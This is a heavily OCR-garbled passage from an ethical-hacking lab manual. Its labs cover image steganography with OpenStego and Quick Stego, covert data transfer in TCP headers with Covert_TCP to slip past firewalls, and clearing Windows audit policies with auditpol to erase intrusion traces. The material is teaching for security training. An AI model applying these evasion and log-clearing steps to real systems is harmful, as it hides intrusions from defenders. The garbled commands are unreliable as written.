Brass 4 23, Close the Windows Photo Viewer, maximize the OpenStego window, 
and dick Extract Data in the left pane. 
‘Obtain the Text 
File From the Р 
Image 
xac maden ама 
att Waters (et 
FIGURE 1358 Trang the Hiden Data 
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24, Click the ellipsis button to the right of the Input Stego File box. 


FIGURES 1319: Clicking Eis Baron 


25.'Ihe Open - Select Input Stego File window opens. Navigate to 
the Desktop, select stego.png, and click Open. 


[E] Open eec тил iege Fle 


Henne [goons 
Fes oftoe: [Sap es and 


FIGURE 1420 Open. Sees Lapat Sg le doe 
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26. Click the ellipsis button to the right of the Output Folder for Message. 
File box. 
а " X 
ie нар 
Extract hidden data 
Nd p 
1de Dais Eara йун ore Г 
Е олла бомаса ie 
enc ns [э] 


FIGURE 132 Open Scat ера Stegu le Window 

27. The Select Output Folder for Message File window appears. Choose a 
locaton to save the message file (Desktop), and dick Open. 

Suec Output Folder Tor Message Fle 


FIGURE 122 Sleet Output Foldet or Message Fike Window 
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28. Click Extract Data. This vill extract the message file from the image апа 
save it onto the Desktop. 


p 


[7177] Extract iden data 


FIGURE 1524: Frc Das 


29. The Success pop-up appears, stating that the message file has been 


successfully extracted from the cover file; the message file is displayed on 
the Desktop. Click OK, 


Success ] 


x 


Ө eerte corte Nov Text Doct 


FIGURE 1526: 
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30. Close the OpenStego window, and double-click New Text 
Document.txt. 


FIGURE 1325 Opening ie Test Document 
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31. The file displays all the information contained in the document, as shown 
in the screenshot: 


E eet 


FIGURE 1326 Fie Containing he eee Information 


32. In real-time, an attacker might scan for images that contain hidden 
information and use steganography tools to obtain the information 
hidden in them, 


Lab Analysis 


Analyze and document the results seated to the lab exercise, 


PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS 
RELATED TO THIS LAB. 


Internet Connection Required 
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Image Steganography using Quick 
Stego 


Quick Sigo hides text in pictures so that only other users of Quick Уйдо can retrieve 
and read the hidden secret messages. 


Lab Scenario 


Pornography sites that are filled with images that sometimes change multiple times 
each day, require authentication in some cases to access their "better" areas of content, 
and the use of stenographic techniques allows an agent to retrieve messages from their 
home bases and send back updates, allin the guise of "porn trading.” Thumbnails can 
be scanned to find our if there are any new messages for the day; once decrypted, these 
‘messages point to links on the same site with the remaining information encrypted. 


"To be an expert ethical hacker and penetration tester, you must understand how to 
hide text inside an image. In this lab, we show how to do so using Quick Stego. 
Lab Objectives 
"The objective of this lab is for students to learn how to hide secret text messages in 
images using Quick Stego. 
Lab Environment 
‘To perform this lab, you need: 

* A computer running Windows Server 2016 

= Administrative privileges to install and nun tools 


+ Or, download Quick Stego tool at httgsfquickcrypto.com/free- 
steganography-software.html 


* Ifyou wish to download the latest version, the screenshots may differ 
* Run this tool in Windows Server 2016 
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Lab Duration 


Time: 5 Minutes. 

Overview of Steganography 

Steganography is the art and science of writing hidden messages in such a way that no 
опе, apart from the sender and intended recipient, suspect the existence of the 
message—a form of security through obscurity, Steganography includes the 
concealment of information within computer files. In digital steganography, leatronic 
communications may include stenographic coding hidden inside a transport yer, 
such as а document file, image file, program, or protocol, 


Lab Tasks 
"The basic idea in this section is to: 
ETT] 1. Navigate to ZACEH-Tools\CEHV10 Modulo 06 System 
ڪڪ‎ Hacking\Steganography Toolsllmage Steganography ToolsiQuickStego 
Uae she tet and double-click QS12Setup.exe, 


inside the image 
2. Follow the wizard-<riven installation steps to install the application. 


Setup - Quick Stego = 8 


Welcome to the Quick Stego 
Setup Wizard 


This vil паз! Quick Stego 12 on your computer 
tie recommended that you close all other spplcatins before 


[ | 
i 


1 
FIGURE TAH ides Sener 22А 
сн Lab Manal Pape AS мса Hacking and Coumermeasures Cop rior © by Eb 


Dl ehe Кости. Reproduction s Sii Poli 


Module 06- System Hacking 


3. On completing the installation, launch the Quiek Stege application from the 
Apps list. 


the Quick Segoe 
hapje 


FIGURE 142 Windom Server 2016- Apps 


4. The Quick Stego main window appears, as shown in the screenshot 
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& Click Open Image, under Picture, Image, Photo File. 


TETER x] 


[e 


se opened ine eis Ө, 
r тр! оттан. 


сызса воа | a 


—— 

6 Navigate to ZACEH-ToolsiCEHv10 Module 06 System 
MackingiSteganography Tools\Image Steganography 
ToolsiQuickStego, select the image file 02 nissan_gt-r specv optjpg, 


and dick Open. 
E Saec an mage Fie To Oper z 
e t i kroge siegon.. + Oek Stege - а 
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9 EEN EET тутты mug 
EI 
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"The selected image is added; it displays the message: THIS IMAGE DOES 
NOT HAVE A QUICK STEGO SECRET TEXT MESSAGE. 


FIGURE Hf Seon nage nla 


8, To embed text in the image, click Open Text, under Text File. 
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9. Navigate to ZACEH-ToolsiCEHv10 Module 06 System 
Hacking Steganography Toolsilmage Steganography 
TeolsiQuickStego, select the text file text file.txt, and click Open. 


TB sc reto Open 


+ Wa RSE занан ` 
- -ne 
Pre (em TT | 
Ш т core functions of LI) 
of QuickCrypro, therefore Lnd 
ope de Free 
me 
pen 


10. Selected text will be added in the text box tight next to the image as shown 
in the following scrcensh 


СЕН Tab Mann Fags? камсы! Hacking and Crumeermessunes Соруу О by аай 


ГИ 
ا‎ 
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Ferner 
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Шашек stego 
impercoptibly 
alters the pixels 
(individual picture 
elements) of the 
image, encoding 
the secret text by 
adding small 
variations in color. 
to the image. In 
practice, to the 
human eye, these 
small differences 
do not appear to 
change tho imago 
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11, Click Hide Text, under Steganography. 


12. Quick Stego application hides the text within the image, which can be 
observed by the message displayed by Quick Stego (The text message 
is now hidden in the image), as shown in the screenshot: 


س | = 


FIGURE 14,10 ing the wert 


13. To save the image ба which the text is hidden), click on Save Image, 
under Picture, Image, Photo File. 


IGURE 14.11: Save the reno ply image 
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14. Provide the file name stego, and click Save (save it to the Desktop). 


CD на 15 The file is now saved as “stego.” Though it seems to be a normal image 
Гере ile, it has the text hidden in it, which can be visible by viewing й in Quick 


сарка ory mage) Stego. 
16, Exit Quick Stego, and re-launch it from the Apps screen. 
17. Click Open Image, under Picture, Image, Photo File. 
18, Browse the Stego file (on the Desktop). 


19. The hidden text inside the image will be displayed as shown in following 
screenshot: 


=x | E EE 


FIGURE 141 Biden ee shoved 
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20, In real-time, an attacker might scan for images that contain hidden 
information and use steganography tools to obtain the information 
hidden in them. 


Lab Analysis 


Analyze and document the results related to the lab exercise, Give your opinion on 
your target's security posture and exposure, 


PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS 
RELATED TO THIS LAB. 
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Covert Channels using 
Covert_TCP 


Thi ruga тафо the TCP | IP уш to transla leone byte ata toe а statim а 
Lab Scenario 
Networks use network access control permissions to permit/deny the traffic through 
them, ‘Tunneling is used to bypass the access control rules of firewalls, IDS, IPS, web 
proxies to allow certain traffic. Covert channels can be made by inserting data into 
unused fields of protocol headers. 'Thete are many unused or misused fields in ТСР 
or IP over which data can be sent to bypass firewalls. 
Lab Objectives 
‘The objective of this lab is to help students learn: 

= Howto carry covert traffic inside of unused fields of TCP and IP headers? 


Lab Environment 

‘To catty out this lab, you need: 
= A computer running Windows Server 2016 
» Kali Linux running as a virtual machine 
» Ubuntu running as a virtual machine 

Lab Duration 

Time: 10 Minutes. 


Overview of Covert TCP 


Covert ТСР manipulates the TCP/IP header of the data packets to send a file one 
byte at a time from any host to а destination, It can act like а server as well as a client 
and can be used to hide the data transmitted inside а IP header. This is useful when 
bypassing firewalls and sending data with legitimate looking packets that contain по 
data for sniffers to analyze. 
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Linux machine, launch a Terminal window and type ed Desktop. 
Hit Enter to change the current working directory to Desktop. 


MakeaSecret | _ мш: nai дына. 
Message File төш bep 
Souen Termat нер 
FIGURE 151: айван Deep 
2. Туре mkdir send and hit Enter to make a folder named send on the Desktop. 
Tiai р өөө 
ie ып View Search Term Heip 
TTT 
3, Then to change the current working directory to send, type ed send! and hit 
Enteras shown in the screenshot. 
Е Тока еер па ӨӨӨ 
Fs ын Vew Seach еткш Heip 
FIGURE: Майра 
ETT 4, Now type ocho “Secret Message” > mossago.txt and hit Enter as shown 
ڪڪ‎ in the screenshot. This makes а new text fle named message containing the 
minds: string “Secret Message". 
covert tcp. 
ТЕ $86 
e tit Vew Search Terminal Help 
CELA Mad Baw? кой Hacking and Goancmeasires Cop © by fanc. 


Module 06- System Hacking 


5. Now navigate to ZACEH-ToolsiCEHv10 Module 06 System 
HackingiCovert TGP and copy eavert.tep.e and paste it in the send folder 
as shown in the screenshot. 


fre 

Lo CES mus оз 

Кы — "x 

D nee vert 

ons | 

BER zm 
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FIGURE MSS Paingan epee 


6. Switch back to the terminal and type ec -o covert tep covert tepic and hit 
Enter as shown in the screenshot. This compiles the covert tepe file. 


тенләй: —/безтөр/зеп $ 6 6| 
nie tdt Vw емет Terminal нер 


aep. esas, 


FIGURES 


Now switch to the Ubuntu machine. Open a terminal window and type sudo 
‘su, Hit Enter to gain supcr-uscr access. 


ШЫ халек а 8. Ubuntu will ask for the password, type toor as the password and hit Enter. 


Mako a Receiving Note: The password you type will not be visible in the terminal window. 
Destination 


root@jeson-Virtual-Mschine: /h 
udo] password for Jas 
ют 1авоп- Virtual Machine: /h 
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9. Туре tepdump -nvX port 8888-i lo and hit Enter to start tepdump as shown 
inthe screenshot. 


word for jason. 


—À 
10. Now leave the tepdump listener running and open another terminal window. 
Туре ed Desktop! and hit Enter as shown in the screenshot. 


FIGURE 158 онуй Dedi 
11. Type mkdir receive and hit Enter. 


FIGURE 1510 Malinga ме 
12. То change the current working directory, type ed receive! and hit Enter. 


Jason lason Virus масле: 


FIGURE 111. Navin othe oer 


Ж тє 13 Now navigate 10 ZAGEH-Tools\CEHV10 Module 06 System 
ERE IUD MackingiCovort ТСР and сору covert tep.c and paste it in the receive folder 


шере as shown in the screenshot 
covert tcp. 

rm 
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m оа 
pee 
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14, Switch back to the terminal and type ee -o covert tcp covert tep- and hit 
Enter as shown in the screenshot, This compiles the cover rcp.c file. 


FIGUM ISI Complore Re 
15. Now type sudo su and hit Enter to gain super-user access 


ШП тани 16. Ubuntu will ask for the password, type toor as the password and hit Enter. 


Setup а Listener Note: The password you type will not be visible in the terminal window. 


FIGURE 15.141 Get pre ae 


17, To start a listener, type Jeovert tep -dest 10.10.10.9 -source 10.10.10.11 
-source port 9999 -dest port 8888 -server -ile 
RomejasonIDesktop!receiveireceive.txt and hit Enter as shown in the 
screenshot 


rootp)azon-Virtual-achine: home /Jason/Desktop/recelve 


ic 


m— 


CER Lab Mana Fog Tal Hacking und Courtermeasums Cupyrgh © by Eb 
DM Rakes Reeve Repmdoeton o Sci Probie 


Module 06- System Hacking 


= 18 Now switch back to the Kali machine. Navigate to Applications > 


rass оз. Sniffing & Spoofing and click wireshark as shown in the screenshot. 
Launch Wireshark 
FAGUR лела нейи 
19, Wireshark starts and a popup saying “Lua: Error during loading: appears. 
Click OK to continue, 
нкан 
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20. Double-click on your primary network interface (here ев) to start 
capturing traffic аз shown in the screenshot. 
ООШ EXE 


am c@ ORE Vee 


ен —| 


FIGURE 15s Stari the тавары 


T TXER Y 21, Minimize Wireshark and switch back to the terminal window. 
Start Sending the 22, Type „covert tcp -dest 10.10.10.9 -source 10.10.10.11 -source port 8888 
Message -dest port 9999 -file root/Desktop/sendimossage.txt anc! hit Enter to start 


sending the contents of message.txt fle over tcp. 


талака -IUssktopisand [X -| 


rie tdt View Stet Temi Нер 


overt tep.ci45i1s 
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23. Covent tp starts sending the string one character at a time as shown in the 
screenshot. 


С $6] 


mm 


—«—m 


24. IF you switch to the terminal window in Ubuntu, you will see the message 
being received as shown in the screenshot. 


FIGURE 1521 Coven spacing 
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25, Close this terminal and open the second terminal running in Ubuntu, Press 
Ctrl to stop tcpdump. 


E ras 26, You will see that tcpdump shows that no packets were captured in the 
кее се network as shown in the screenshot. Close the terminal, 


FIGURE 1823 Татр sowing paces pied 

27. Now switch to the Kali Linux machine. Navigate to Home/Desktopireceive 
and double-click the reeeive.txt file to view its contents. You will see the fall 
message saved in the file as shown in the screenshot. 


с 


FIGURE 1523 Mesa eolin suo e 


28. Now switch back to the Кай Linux machine. Close the terminal windows and 
open wireshark. 
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29, Click thc stop packet capture button from the menu bar as shown in the 
screenshot. 


FIGURE 1524 Sepping he pedet cine 


30, In the Apply a display fitter field, type tep and hit Enter to view only the 
ТСР packets as shown in the screenshot. 
LL 
e Ve & Gear нүө реш Tage жет Jo i 
DELHI ASe aea азат 


m— 

31. If you examine the communication between Ubuntu and Kali machines, ie. 
40:10.40.44 and 10.40.40.9 you will find cach character of the message string 
being sent in in individual packets over the network as shown in the following, 
sereenshots. 
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32 Cover, tep. changes the header of the tep packets and replaces it with the 
characters of the string one character at a time to send the message without being, 
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FIGURE 1526 Pride TCP ошер, change to send themes ecl 
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Lab Analysis 


Analyze and document the results sclated to the lab exercise. 


PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS 
RELATED TO THIS LAB. 
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Viewing, Enabling and Clearing 
Audit Policies using Auditpol 
Andipal а command in Windavs Server 2016, Windows Server 2012, and Windows Server 
2008, and i reque fr querying or confegnivg audi pol at the sibaitegory lend 

Lab Scenario 


Ta the previous labs you have seen different steps that attackers take during the system. 
hacking lifecycle. They start with gaining access to the system, escalating privileges, 
executing malicious applications, and hiding files. However, to maintain their access 
to the target system longer and avoid detection, they need to dear any traces of their 
intrusion. Tt is also essential to avoid a trace back and а possible prosecution for 
hacking, 
‘One of the primary techniques to achieve this goal is to manipulate, disable, or erase 
the system logs. Once they have access to the tatpet system, attackers can use inbuilt 
system utilities to disable or tamper logging and auditing, mechanisms in the system. 
Lab Objectives 
The objective of this lab is to help students learn: 

= How to set the Audit Policies? 


Lab Environment 
То сату out this lab, you need: 
*— Auditpol which is an built-in command in Windows Server 2016 


= You can see mote audit commands at httpy/technet.microsoft.com/en- 
us/libraryice731451%28v=ws.10%29-aspx for Windows Server 2016 


+ Run thison Windows Server 2016 
Lab Duration 
Time: 10 Minutes 
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‘Sets the audit policy. 
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Overview of Auditpol 


Auditpol displays the information on the performance and functions to manipulate 
audit policies. 


Lab Task 
1. Launch Command Prompt from the Windows Server 2016 machine. 
2. To view all the audit policies, type the following command: 
auditpol iget /eategory:* 
5. Press Enter. 
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4. To enable the audit policies, pe the following at the command prompt: 


— 
Configure giobal auditpol set /category? system 
resource system acces Railure:enable 
Contr its GAEL) 


"account logon" success:enable 


Press Enter, 
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FIGURE 162 Adel Local Securty Poss in Widow Sever 2016 


6. To check whether audit policies arc enabled, type the following at the 
command prompt: auditpol get /eategory: 
7. Press Enter. 
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8. То clear the audit policies, type the following at the command prompt: 
auditpol iclear у 
9. Press Enter. 
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FIGURE 16A Auli d 


10, To check whether audit policies cleared, type the following at the command 
Prompt: 
ашара! get ícategory:* 

11, Press Enter. 
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Lab Analysis 


Analyze and document the results related to the lab exercise, 


PLEASE TALK TO YOUR INSTRUCTOR IP YOU HAVE QUESTIONS 
RELATED TO THIS LAB. 


Internet Connection Required 


D Yes E No 
Platform Supported 
WÎ Classroom Е iLabs 
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